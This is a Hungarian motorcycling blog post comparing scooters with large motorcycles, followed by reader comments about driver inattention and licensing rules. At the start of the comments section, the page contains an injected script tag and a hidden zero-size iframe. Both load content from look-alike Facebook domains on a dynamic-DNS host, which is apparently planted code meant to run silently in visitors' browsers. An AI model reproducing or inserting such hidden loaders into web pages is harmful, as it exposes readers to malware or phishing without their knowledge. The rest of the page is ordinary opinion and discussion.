Street Racer STR motoros kesztyű a MotoZemtől

Robogó Vs. Nagymotor

Motorozásról olvasgatok. Számomra robogóval közlekedni sokkal félelmetesebb, mint nagymotoron, mert azon a járművön vagyunk legkevésbé "láthatók", hiszen kevesen viselnek rajta védőfelszerelést (vagy hiányosan), sokkal fürgébbek a dugóban, mint nagy társaik, hirtelen ott teremnek mindenhol, egyszerűen lehetetlen őket nyomon követni és még hangjuk sincs. Hát, ezért vettem én nagymotort...

Igaz, hogy a robogósok, motorosok rengetegen vannak, de a mai világban a közlekedésben egyre kevesebb a tolerancia, az előzékenység, az ember védtelen az autókkal, sőt, teherautókkal vagy buszokkal szemben, hiszen, egy baleset alkalmával azokban szinte kár sem lesz, míg a motoros jól összetörheti magát. Felépülési idő fizikailag-lelkileg egyaránt hosszú lehet.

Amióta szerencsém van gyakorlatban is egyre jobban megtapasztalni eme páratlan kétkerekű előnyeit (és hátrányait), azóta sokkal kiélezettebb vagyok az összes forgalmi szituációra, de a 2 évvel ezelőtti balesetemből kifolyólag legfőképpen a mellékutcából figyelmetlenül kihajtó autósokra. Rettenetes, mennyire elkerüli a figyelmüket, hogy csupán 1 lámpa közeledik, nem kettő. Rendben van, hogy a motorosnak kell kivédeni a másik figyelmetlenségét is, az is rendben van, hogy jó fékkel van felszerelve, sőt, még az is rendben van, hogy a motorosnak kell sokkal éberebb lennie, hiszen sokkal többet veszíthet. De ha lehetne új törvényt vagy jogszabályt behozni, akkor az összes autóst újra vizsgáztatnám és beletennék egy új vizsgafeladatot, mégpedig azt, hogy mindenki, kivétel nélkül üljön fel egy robogóra és menjen a forgalomban legalább egy pár órát, hogy megtapasztalja a másik oldalt is! A szomorú ebben az, hogy szerintem ez sosem fog eljönni. És addig bizony saját magunknak kell ébernek lennünk, ezerszer jobban odafigyelnünk, koncentrálnunk és felkészültebben vezetnünk az utakon.

A robogóval szemben a nagymotorok előnye, először is a méret, az erős hang, és a védőfelszerelések minősége és darabszáma, amivel talán kicsivel jobban meg lehet előzni a baleseteket. Bár a méret egyúttal a hátránya is lehet, hiszen a sebesség miatt egy pillanat alatt ott tud lenni a következő saroknál, ahol egy figyelmetlen, dekoncentrált autós hajt ki éppen a mellékutcából.

Hozzászólások

<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>
Pimpa;bt20970 írta:
Viszont ha minden atósnak motoroznia kéne a jogsiért, akkor mondjuk a motorosok is vezethetnének esetleg egy 40 tonnás nyergest a jogsiért mert az is egy más világ. Így mindenki egy füst alatt megszerezne minden létező papírt. :)
Az meg, hogy egyesek azt se tudják mi az a jobbkesztyű az mellékes. Én nem merek a házunk mellől kikanyarodni mert autós, motoros simán elhúz balról. Vagy mert nem tudja, hogy jobbkezes, vagy csak éppen sms-ezik, sminkkel, vagy tesz rá, mert tegnap se jött seki. :D
Egy füst alatt, ez tetszik. Aki ült már kamionban, akár utasként is, annak a motoros és autós egyaránt tud meglepetést szerezni. Vannak a normálisan közlekedők, a többiek meg újjal mutogatnak egymásra: a hülye motoros --> a figyelmetlen autós --> és a bunkó kamionos ... és ez mehet körbe-körbe.
 
Csak most sikerűt óvasni a blogodat. Teljessen igazad van a kötelező robogózásba, de nemcsak a másik ódal megtapasztalása miatt. Ugye B-s jogsivaa lehet ezeket vezetni. Döbbenetessen sok ollyan baleset van, hogy B-s jogsivaa hajtanak 50-est, oszt amikó nem úgy működik a dolog, ahogy autóba, csodákoznak jobb esetbe, hogy nincsen szerencséjük. És igen sok esetbe a robogósok miatt ítélik ee a nagymotorraa közlekedőket is, ahogy Győrbe is vót kb. 8-10 éve, amikó apucianyuci eekényeztetett beképzeet kis taknyai miatt szopattak minket hülyére.
 
Nem is szabadna megengedni B-s jogsival kétkerekűt vezetni (leszámítva a biciklit:D)
Motor (és robogó) autóval nem egy kategória, előbbiben sokkal védtelenebbek vagyunk, teljesen más reflexeket kíván meg mindenkitől, sokkal szemfülesebbnek kell lenni!
 
vasember;bt21023 írta:
Nem is szabadna megengedni B-s jogsival kétkerekűt vezetni (leszámítva a biciklit:D)
Motor (és robogó) autóval nem egy kategória, előbbiben sokkal védtelenebbek vagyunk, teljesen más reflexeket kíván meg mindenkitől, sokkal szemfülesebbnek kell lenni!

Így van. Pont ezért írtam, hogy jó lenne, ha mindenki tapasztalatot szerezne motorozásból, aki megszerzi akármilyen járműkategóriára a vezetői engedélyét...hogy lássa, érezze a másik oldalt is.
 
Vidék;bt21018 írta:
Csak most sikerűt óvasni a blogodat. Teljessen igazad van a kötelező robogózásba, de nemcsak a másik ódal megtapasztalása miatt. Ugye B-s jogsivaa lehet ezeket vezetni. Döbbenetessen sok ollyan baleset van, hogy B-s jogsivaa hajtanak 50-est, oszt amikó nem úgy működik a dolog, ahogy autóba, csodákoznak jobb esetbe, hogy nincsen szerencséjük. És igen sok esetbe a robogósok miatt ítélik ee a nagymotorraa közlekedőket is, ahogy Győrbe is vót kb. 8-10 éve, amikó apucianyuci eekényeztetett beképzeet kis taknyai miatt szopattak minket hülyére.

Az elkényeztetett csöppök pedig az egyik legveszélyesebb fajta az utakon...
 

Blogbejegyzés információ

Szerző
asbaba
Olvasás
242
Hozzászólások
148
Utolsó frissítés

Motoros blogok további bejegyzései

asbaba további bejegyzései

Oszd meg ezt a bejegyzést

CsamShop kendők

Back
Oldal tetejére